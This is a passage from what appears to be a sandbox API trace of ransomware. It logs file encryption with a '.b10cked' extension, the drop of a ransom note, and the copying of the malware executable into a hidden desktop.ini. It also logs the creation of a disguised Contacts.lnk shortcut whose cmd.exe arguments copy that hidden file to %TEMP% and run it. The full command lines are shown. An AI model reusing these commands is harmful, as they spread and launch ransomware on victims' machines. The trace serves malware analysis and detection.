lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x10b1e [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0208.327] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x10636 [0208.327] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x10b1e [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x10b1e [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0208.399] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0208.399] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x858e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x858e, lpOverlapped=0x0) returned 1 [0208.516] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0208.516] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x858e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x858e, lpOverlapped=0x0) returned 1 [0208.516] SetFilePointer (in: hFile=0x120, lDistanceToMove=-34190, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8590 [0208.516] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x858e, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x858e, lpOverlapped=0x0) returned 1 [0208.517] SetFilePointer (in: hFile=0x120, lDistanceToMove=-34190, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x8590 [0208.517] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x858e, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x858e, lpOverlapped=0x0) returned 1 [0208.529] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Administrator.contact", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0208.534] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Administrator.contact", cchWideChar=21, lpMultiByteStr=0x1328794, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Administrator.contact", lpUsedDefaultChar=0x0) returned 21 [0208.534] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x10b1e [0208.539] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0208.539] CloseHandle (hObject=0x120) returned 1 [0208.540] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Contacts\\Administrator.contact", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Contacts\\ADMINI~1.CON") returned 0x26 [0208.541] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Contacts\\") returned 0x1a [0208.541] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\Contacts\\ADMINI~1.CON\" \"C:\\Users\\Default\\Contacts\\Administrator.contact.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe54, dwThreadId=0xc4)) returned 1 [0208.543] CloseHandle (hObject=0x1b4) returned 1 [0208.543] CloseHandle (hObject=0x120) returned 1 [0208.543] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\CONTACTS\\") returned 0x1a [0208.543] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\", cchLength=0x48 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\") returned 0x48 [0208.543] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{F325F05B-F963-4640-A43B-C8A494CDDA0F}\\", cchCount2=72) returned 3 [0208.543] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Contacts\\", cchLength=0x1a | out: lpsz="C:\\USERS\\DEFAULT\\CONTACTS\\") returned 0x1a [0208.544] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0208.544] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\CONTACTS\\", cchCount1=26, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0208.544] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0208.544] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0208.544] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0208.544] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Contacts\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Contacts\\") returned 0x1a [0208.544] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0208.544] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0208.544] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x234, dwThreadId=0x42c)) returned 1 [0208.550] CloseHandle (hObject=0x1b4) returned 1 [0208.550] CloseHandle (hObject=0x120) returned 1 [0208.550] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\contacts\\bl0cked-readme.rtf")) returned 0xffffffff [0208.550] GetLastError () returned 0x2 [0208.550] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\contacts\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0208.552] GetFileAttributesW (lpFileName="C:\\Users\\Default\\Contacts\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\contacts\\bl0cked-readme.rtf")) returned 0x20 [0208.552] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0208.552] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0208.553] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0208.553] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0208.553] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0208.553] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0208.553] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0208.553] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Contacts\\", lpszShortPath=0x123ffac, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Contacts\\") returned 0x1a [0208.553] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0208.553] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0208.553] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Contacts", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\Contacts") returned 0x19 [0208.553] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x122 | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\DEFAULT\\CONTACTS\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\DEFAULT\\CONTACTS\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\DEFAULT\\CONTACTS\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\DEFAULT\\CONTACTS\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x122 [0208.553] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0208.553] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Contacts\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Contacts\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Contacts\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0x140, dwThreadId=0x84c)) returned 1 [0208.559] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0210.129] CloseHandle (hObject=0x120) returned 1 [0210.129] CloseHandle (hObject=0x1b4) returned 1 [0210.129] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0210.129] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Contacts", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0210.129] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0210.129] GetTickCount () returned 0x3b02b [0210.129] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=26691864808) returned 1 [0210.129] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x66\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.129] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x50\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x38\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x67\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x49\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x7a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x36\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0210.130] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0210.130] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0210.130] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0210.130] CharUpperBuffW (in: lpsz="explorer.exe \"Contacts\" & type \"Contacts\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x61 | out: lpsz="EXPLORER.EXE \"CONTACTS\" & TYPE \"CONTACTS\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x61 [0210.130] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0210.130] CharUpperBuffW (in: lpsz="explorer.exe \"Contacts\" & type \"Contacts\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x62 | out: lpsz="EXPLORER.EXE \"CONTACTS\" & TYPE \"CONTACTS\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x62 [0210.130] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0210.130] CoInitialize (pvReserved=0x0) returned 0x0 [0210.130] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0210.131] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0210.131] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0210.131] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0210.133] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"Contacts\" & type \"Contacts\\desktop.ini\" > \"%TEMP%\\fPs8gIz6.exe\" && \"%TEMP%\\fPs8gIz6.exe\"") returned 0x0 [0210.133] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0210.133] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0210.133] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0210.133] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\Default\\Contacts.lnk", fRemember=0) returned 0x0 [0210.140] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0210.140] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0210.140] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0210.140] CoUninitialize () [0210.140] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0210.140] ReleaseMutex (hMutex=0xf8) returned 1 [0210.140] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0210.140] ReleaseMutex (hMutex=0xf8) returned 1 [0210.140] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0210.141] ReleaseMutex (hMutex=0xf8) returned 1 [0210.141] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0210.141] ReleaseMutex (hMutex=0xf8) returned 1 [0210.141] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0210.352] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.352] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=26714185324) returned 1 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xe2 [0210.353] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 